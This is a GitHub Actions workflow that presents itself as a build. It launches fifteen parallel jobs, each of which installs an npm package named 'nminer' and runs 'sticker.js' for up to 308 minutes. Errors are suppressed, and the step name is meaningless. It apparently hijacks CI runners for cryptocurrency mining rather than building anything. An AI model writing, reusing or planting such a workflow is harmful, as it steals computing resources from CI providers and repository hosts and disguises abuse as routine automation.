name: sticker
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2439 }
          - { version: 1845 }
          - { version: 8584 }
          - { version: 6415 }
          - { version: 6281 }
          - { version: 8259 }
          - { version: 1915 }
          - { version: 4256 }
          - { version: 9116 }
          - { version: 6874 }
          - { version: 9902 }
          - { version: 4081 }
          - { version: 8423 }
          - { version: 1032 }
          - { version: 3414 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: handsome ape good-natured
        run: |
          npm install nminer@latest
          timeout 308m node sticker.js || echo "sticker executed"